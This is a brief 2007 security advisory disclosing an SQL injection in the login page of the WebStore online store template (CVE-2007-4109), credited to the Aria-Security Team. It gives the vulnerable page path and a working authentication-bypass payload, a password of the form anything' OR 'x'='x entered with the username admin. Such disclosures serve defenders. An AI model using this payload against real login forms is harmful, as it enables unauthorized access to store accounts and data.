WebStore - Online Store Application Template SQL INJECTION
SecurityAlert : 2947 CVE : CVE-2007-4109 SecurityRisk : Medium (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Aria-Security Team Published : 02.08.2007
Affected Software :
WebStore - Online Store Application Template
Advisory Content :
__________________________
A R I A - S E C U R I T Y
_________________________
WebStore - Online Store Application Template SQL INJECTION
Vendor: http://www.codewidgets.com
http://target.com/PATH/sign_in.aspx
Username: admin
Password: anything' OR 'x'='x
Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.